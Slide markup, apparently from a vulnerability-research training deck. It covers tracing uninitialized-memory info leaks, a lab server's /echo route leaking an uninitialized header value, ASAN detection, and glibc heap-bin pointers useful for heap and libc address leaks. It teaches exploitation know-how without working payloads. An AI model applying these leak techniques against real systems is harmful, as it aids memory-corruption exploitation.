              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US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924538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C7DE-5500-9841-AF51-98FA76B8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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>BleedingTooth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD7EFB6-528F-574B-9CCB-7BAB43F8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820" y="1702196"/>
            <a:ext cx="5596180" cy="3317232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{964C4CAD-6110-694E-9138-A787FEE2DB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799951" y="3123735"/>
            <a:ext cx="18333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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE9703C-7BAF-C64F-BE03-864FB51317CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3890075" y="2718196"/>
            <a:ext cx="33837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ype confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED97FBBF-3118-4544-9F2B-D21BDEE7E432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3890075" y="2718196"/>
            <a:ext cx="0" cy="19347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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4056E2C-09B6-3445-9555-F44CF407ADA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3890074" y="4652901"/>
            <a:ext cx="33837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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2AB37F-14F4-B64F-83D9-4047A6DE73F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799949" y="3685548"/>
            <a:ext cx="18333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92D82-8CB2-5B40-9310-00743835E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1"/>
            <a:ext cx="3315669" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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a2mp_info_rsp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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sent back to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only SOME of the fields set in error path</a:t>
            </a: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68B41058-3FF9-5E4E-B099-76267CACA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54" y="2924010"/>
            <a:ext cx="3149065" cy="21487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782F5D-1D65-654C-B4D9-87A51B8AF611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398753" y="3626434"/>
            <a:ext cx="3149065" cy="13929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75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2AA4-E092-7146-BE5D-7A23E961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273847"/>
            <a:ext cx="8514159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 Vuln Hunt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3A3923F-BA97-1FE9-061D-51B0BC66B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Uninitialized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0646-0A80-5348-A937-C3B987AFE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0" y="1809066"/>
            <a:ext cx="5476491" cy="276344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Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of a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calls to pre-initialization (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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,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calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc.)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none, then continue to step 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Check that ALL fields are set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Uninitialized memory info leak">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90626663-9249-6343-976F-D725E2EB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3531568"/>
            <a:ext cx="8394700" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5AEEAD-9C68-E340-BC68-631DD540A01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335796" y="4928568"/>
            <a:ext cx="23045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91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4E7A-C9B6-EC4F-AF33-9CCA7ED9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Sanitizer (ASAN)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F111F-E99A-4546-8BB7-958752D01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Detects MANY memory corruption bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>dynamically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Stack/heap overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use after frees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initializes ALL memory to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>0xBE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to detect bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for this pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="ASAN output from request - question marks indicate data that the terminal cannot render">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F0E91C-F70E-5149-B369-3E2A735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33" y="1733627"/>
            <a:ext cx="3259367" cy="1676246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Hexdump of the output 0xbebebebe">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30729F1-B51A-7A41-930E-78998E590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8545"/>
            <a:ext cx="6083300" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F28304-2022-A147-A0AD-7E8D6F8D6A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785965" y="4803543"/>
            <a:ext cx="129733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 descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9B5AB6-0376-6145-A09C-B9E1FA1E1014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935065" y="5071545"/>
            <a:ext cx="14600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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CE8102-B33C-2D44-88B0-274AC28AC390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271288" y="3409873"/>
            <a:ext cx="14600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821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2AA4-E092-7146-BE5D-7A23E961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273847"/>
            <a:ext cx="8514159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Your Turn to Trace Bugs!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3A3923F-BA97-1FE9-061D-51B0BC66B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Uninitialized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0646-0A80-5348-A937-C3B987AFE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1809066"/>
            <a:ext cx="4562092" cy="276344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Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of a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calls to pre-initialization (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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,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calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc.) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>- If none, then continue to step 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Check that ALL fields are set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Uninitialized memory info leak">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90626663-9249-6343-976F-D725E2EB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3531568"/>
            <a:ext cx="8394700" cy="1397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DF4D4FE-D6C8-F74D-8806-C2A5606346D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5400737" y="1229576"/>
            <a:ext cx="3868340" cy="617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Exploitation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F37B95-DF41-CE4B-A519-632BB06EA53C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5246176" y="1840691"/>
            <a:ext cx="3778364" cy="1659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CA26-59AD-3B48-A321-F3C4540DD365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5246176" y="1878806"/>
            <a:ext cx="3897171" cy="276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8255AC-5343-704D-881B-254F378E1680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127368" y="1809065"/>
            <a:ext cx="3778363" cy="16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Vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i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server.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i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/>
              <a:t>Use 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/echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> route to get leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Turn on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>ASAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187486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E5BA-16E7-DA4C-B148-60DD953B6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27" y="21076"/>
            <a:ext cx="8973033" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Header Value Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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parse_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="header_data-&gt;value is NEVER initialized properly">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{086CB70B-60EC-1549-A7ED-D99AFF1F5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006" y="3054690"/>
            <a:ext cx="7578994" cy="208881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BB7A2-A0D5-2A44-9929-CCCAD2E842D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675145" y="1437107"/>
            <a:ext cx="8142200" cy="2763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header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,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name_len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1"/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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,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value_len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Data inside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header_data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-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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NEVER initialized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Header without a value">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB02E296-B976-F445-9DD0-0F1BB7E7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45" y="1015248"/>
            <a:ext cx="4436016" cy="1448495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3A93BD-4F5D-A545-B0FD-87E3B53EE9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746245" y="1969111"/>
            <a:ext cx="18333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565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E45F-B804-6149-8400-63E80236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Value – /echo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EB8F-3BBB-E943-B46E-84E05A0D6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2977" y="719720"/>
            <a:ext cx="2432373" cy="847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 ‘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memset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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Query data without 'value' ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0608785-3D09-4F40-8591-59ECBAAC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090293"/>
            <a:ext cx="6261100" cy="177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2444AC9-1933-3C4F-B957-849988707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4770"/>
            <a:ext cx="9144000" cy="17815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EACD22-94BA-8A4A-8E70-325B7175DF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="111713" y="5036999"/>
            <a:ext cx="8513093" cy="154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577176-AA51-0341-8FED-29C83821D059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450527" y="2842458"/>
            <a:ext cx="6670944" cy="84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strlen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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instead of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query_data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-&gt;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value_len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54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74D2B9C-B582-4616-AA35-49098AD3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613"/>
            <a:ext cx="3541898" cy="1200150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Reviewing the Small Bin/Unsorted Bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Smallbin diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6800F6-0CC5-994A-AF3A-FE9FA214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23" y="1587225"/>
            <a:ext cx="3568135" cy="321203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7BF8C4D-23C1-4C9F-83FE-05814B0D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382" y="1546620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end of a list points to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>bin: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LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Pointers to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>previous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chunk: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Heap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 and Bk pointers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for heap and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leaks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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3815610" y="1869812"/>
              <a:ext cx="285480" cy="42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6610" y="1860812"/>
                <a:ext cx="3031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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3277845" y="3302283"/>
              <a:ext cx="347760" cy="37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8845" y="3293292"/>
                <a:ext cx="365400" cy="387703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6281C-69EB-9045-B05D-4AA66B6E5E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1689846" y="2084012"/>
            <a:ext cx="2137606" cy="956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91BC4-09E9-9B48-93BD-46DE3B36977C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784658" y="3020559"/>
            <a:ext cx="1492665" cy="4078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A9DC3219-D0CB-184B-8B91-2B8DC98584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743938-ECFF-9549-8A14-F50A9A1F1229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7720578" y="1331106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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7703208" y="709844"/>
              <a:ext cx="207570" cy="26102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94559" y="700856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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7918387" y="704842"/>
              <a:ext cx="200271" cy="24025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9742" y="695850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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8232974" y="761352"/>
              <a:ext cx="911026" cy="28551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23972" y="752712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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8244233" y="760994"/>
              <a:ext cx="444792" cy="12795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35229" y="751983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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7703544" y="975185"/>
              <a:ext cx="26640" cy="340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94544" y="966545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262304F-6CB3-F44B-AD17-536EAD72BB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8133024" y="883953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8363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DDF3-B8C6-8841-868E-E95B8C43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Leak Information for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39FA-ABFF-6546-9AC1-5D0C1A08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26569" cy="3633112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCache:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd &amp; Key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 err="1"/>
              <a:t>Fastbin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Fd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/>
              <a:t>Unsorted Bin/Small Bin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd &amp; Bk used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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large Bin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd, Bk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fd_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bk_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Large bin chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE541B55-B8BC-5A4F-A4BE-5A681755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02" y="1079584"/>
            <a:ext cx="1459283" cy="3633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3438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259F-2D69-794D-951D-75C30E5D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86" y="180965"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing Allocations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335B7-CF5D-0647-A583-CFDB46EDC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15" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls to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malloc()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls to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free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Sizes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="Trace the Number. Tracing Number with Christmas Lights. Educational  Children Game Stock Vector - Illustration of christmas, child: 203702953">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D0A874-0EE3-BA48-8199-E8677CD4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14" y="119561"/>
            <a:ext cx="3479964" cy="378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is_heap_chunks output">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DC4B8B-645B-5B4F-8026-A80995143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31" y="2981790"/>
            <a:ext cx="4473562" cy="16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436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DDF3-B8C6-8841-868E-E95B8C43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Leak Information for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39FA-ABFF-6546-9AC1-5D0C1A08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26569" cy="3633112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsorted Bin/Small Bin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd &amp; Bk used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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large Bin: </a:t>
            </a:r>
